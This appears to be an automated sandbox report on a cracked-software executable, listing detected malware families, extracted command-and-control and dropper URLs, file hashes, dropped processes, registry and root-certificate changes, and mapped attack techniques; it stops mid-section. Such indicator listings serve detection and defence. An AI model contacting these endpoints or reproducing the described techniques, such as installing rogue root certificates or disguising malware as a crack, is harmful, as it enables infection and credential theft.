azorult | af8a3d27f70eb441ea891096f6857ebbec699b3bea8a27e8853b8b77d4c63d5d

Analysis

max time kernel
48s
max time network
303s
platform
windows10_x64
resource
win10v20201028
submitted
03/04/2021, 07:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tekla_Structures_Extension_crack.exe
Size

5.4MB
MD5

baad366f257529076340afc66d1ac59c
SHA1

3dafcc431b85bd6a527e70879137e1f27e160849
SHA256

3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
SHA512

98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85

Score

10^/10

azorult glupteba metasploit smokeloader xmrig backdoor dropper infostealer loader miner trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral2/memory/3252-199-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral2/memory/3252-201-0x0000000002570000-0x0000000002E7A000-memory.dmp	family_glupteba
behavioral2/memory/3252-202-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 4 IoCs

miner

resource	yara_rule
behavioral2/memory/3468-153-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/3468-154-0x00000001402CA898-mapping.dmp	xmrig
behavioral2/memory/3468-161-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/3468-222-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 10 IoCs

pid	Process
3912	keygen-pr.exe
1020	keygen-step-1.exe
1568	keygen-step-3.exe
3092	keygen-step-4.exe
2060	Setup.exe
3824	key.exe
2300	multitimer.exe
3680	setups.exe
1312	askinstall20.exe
1344	setups.tmp

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
1344	setups.tmp
1344	setups.tmp
1344	setups.tmp
1344	setups.tmp
1344	setups.tmp
1344	setups.tmp
1344	setups.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
139	ipinfo.io
217	ip-api.com
270	api.ipify.org
304	ip-api.com
358	ipinfo.io
360	ipinfo.io
121	api.ipify.org
134	ipinfo.io

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
9100	644	WerFault.exe	155
7940	644	WerFault.exe	155
6280	644	WerFault.exe	155

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5300	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
4304	taskkill.exe
1688	taskkill.exe
6848	taskkill.exe
3900	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{320AE721-C9C7-474E-8C0C-C8EC99FC751E} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000ac2e246ebec223de0213b32d31ff8a3f34a5e12a316ff25e2bdd71960b2f0e138f646919d13ff4a13d3b3ac7dca5bb26cb514b319f88968f05301bd4005636150b90b86269dea757d7009f764775451aed8376fcb213ff450b304b5a577614c2c6d00feb723d6f1b5f8384e5690d6a1e885abd702baf9ff942fd5147fd2e372ccc45ed355ffd4836a6e24035d10e4d6e50f691e1d3fbedab23b71daf822059d415108792c9be1259553f2f2b0f1928892b7776e33e994f67617ed51689ebf7376b4fdb5a8220b3e681b87e93c7cc5fd1a1fc3b70652888d577728bb9842f1d009523407f95c31f4e7c6f0bf14cc9f3bbe9a7185dcb4772df62b332a49d8c4fb5ecac6863ff471076c682e85f05aec78c0097c71f4998bd5f4561319bf2a206041a0bee094e4d76382913ffb3ba1cd1a755ec0fdf68ba4fe6139c14d50e11bf96435ef89072736ce7a5400bdf20b4e46d63c66edc974ccf8a0884b98226793a78e2c6cfff385af3ee132b921fd214caaaad4410230ef012cef03944264f7ab50d7f64c862eaa2957a85f21bfe6cdee0959288b3931d45028fdbbfd28466d39bad6c3d1312f48f	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000538449bacb1d69e57ded329594aacb8f03efce69afad4c87b8cd6cd19c59b0dbfaf1a951d0746005430883edbbb7895a5e72ace35bf8d6ad12b5	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000a7997447cf2d8eef61cd107fb8da8a619feec64df3fe03baece9a8def8d41500ce0f6c4b546b8201d93424e2e14462962cd1a21d8ef6c76da621c11025cdf0508346f034dc651409276592813b0080c78d87a3a64d8eb9438e96	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 96aea8fd6e28d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{3280D0C5-A6C6-4901-8C2E-2AE7834E8D19}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
3168	PING.EXE
5848	PING.EXE
5284	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
